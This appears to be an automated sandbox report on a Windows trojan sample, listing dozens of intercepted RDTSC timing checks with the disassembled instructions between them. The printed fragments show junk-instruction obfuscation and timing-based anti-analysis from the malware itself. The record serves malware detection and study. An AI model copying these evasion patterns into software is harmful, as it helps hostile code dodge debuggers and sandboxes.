Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC07CF second address: DC07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0922 second address: DC092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC2477 second address: DC247D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6ED6 second address: DC6EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F362081F5A1h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F362081F596h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6EF7 second address: DC6F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9102h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6F13 second address: DC6F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFEBF second address: DCFEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD62 second address: DCFD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD68 second address: DCFD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD6C second address: DCFD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F362081F5A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD3D05 second address: DD3D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA544 second address: DDA580 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F362081F59Ah 0x00000008 pushad 0x00000009 jmp 00007F362081F59Dh 0x0000000e jmp 00007F362081F5A9h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA580 second address: DDA58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3620DC90F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA58A second address: DDA5A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F362081F59Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA5A6 second address: DDA5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E3C second address: DD8E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E40 second address: DD8E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E4C second address: DD8E5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E5C second address: DD8E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E62 second address: DD8ED2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F362081F5A5h 0x0000000f jnl 00007F362081F5BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F362081F59Ah 0x0000001c jmp 00007F362081F5A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8ED2 second address: DD8ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD916D second address: DD9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD9173 second address: DD917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD942E second address: DD944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F362081F5A2h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA258 second address: DDA274 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3620DC9106h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA274 second address: DDA279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA279 second address: DDA296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9103h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDD228 second address: DDD22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCDC1 second address: DDCDCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCF76 second address: DDCF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCF7B second address: DDCF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3620DC90F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DEE6E9 second address: DEE71A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F362081F5A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F362081F59Ah 0x00000011 push esi 0x00000012 jl 00007F362081F596h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE8B26 second address: CE8B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE8B2A second address: CE8B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A7h 0x00000007 jo 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F362081F59Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF3805 second address: DF380B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF380B second address: DF3821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F362081F5A1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF3821 second address: DF3863 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3620DC910Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f jmp 00007F3620DC9105h 0x00000014 jns 00007F3620DC90FEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DEAB34 second address: DEAB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D48 second address: E19D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3620DC90F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D5A second address: E19D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D5E second address: E19D82 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC90FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC90FCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D82 second address: E19D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Fh 0x00000007 jnl 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D9F second address: E19DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E18AEC second address: E18B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jc 00007F362081F596h 0x0000000c jmp 00007F362081F5A8h 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F362081F5A8h 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E18B2F second address: E18B52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 jng 00007F3620DC90F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3620DC90FFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E193D7 second address: E193FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F362081F5BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F362081F5A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E195A0 second address: E195E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9108h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F3620DC9104h 0x00000011 jmp 00007F3620DC90FAh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E1FA5D second address: E1FAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F362081F596h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 add edx, dword ptr [ebp+122D5AEBh] 0x0000001b push dword ptr [ebp+122D1EA5h] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F362081F598h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b js 00007F362081F59Ch 0x00000041 mov dword ptr [ebp+122D2936h], ebx 0x00000047 push 2B1FEB3Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e jl 00007F362081F598h 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E21372 second address: E213CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F3620DC90FAh 0x00000017 jmp 00007F3620DC9106h 0x0000001c popad 0x0000001d jmp 00007F3620DC9108h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E213CA second address: E213CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E213CE second address: E213D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0138 second address: 4FC0142 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EB5 second address: 4FE0EE2 instructions: 0x00000000 rdtsc 0x00000002 mov si, B5ADh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F3620DC90FAh 0x0000000d jmp 00007F3620DC9102h 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EE2 second address: 4FE0EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EE6 second address: 4FE0EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EEC second address: 4FE0F54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F362081F59Eh 0x00000011 jmp 00007F362081F5A5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F362081F5A0h 0x0000001d xor cl, 00000068h 0x00000020 jmp 00007F362081F59Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0F54 second address: 4FE0F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80170 second address: 4F80174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80174 second address: 4F8017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F8017A second address: 4F801AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 46h 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F362081F59Ah 0x00000012 and esi, 66F80098h 0x00000018 jmp 00007F362081F59Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov eax, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801AD second address: 4F801B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801B2 second address: 4F801B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801B8 second address: 4F801BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801BC second address: 4F80209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007F362081F5A6h 0x0000001a or esi, 37177488h 0x00000020 jmp 00007F362081F59Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80209 second address: 4F80231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ah, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3620DC9109h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0DC2 second address: 4FA0DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0DC6 second address: 4FA0DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50107E3 second address: 5010802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushad 0x0000000f jmp 00007F362081F59Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5010802 second address: 5010818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3620DC90FDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000897 second address: 500089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500089D second address: 50008A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50008A1 second address: 50008FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F362081F59Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov cx, 621Dh 0x00000016 mov ecx, 184D0319h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F362081F5A1h 0x00000026 pushfd 0x00000027 jmp 00007F362081F5A0h 0x0000002c sbb ax, 27D8h 0x00000031 jmp 00007F362081F59Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50008FD second address: 5000915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000915 second address: 500093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F362081F5A0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500093B second address: 500093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500093F second address: 5000945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
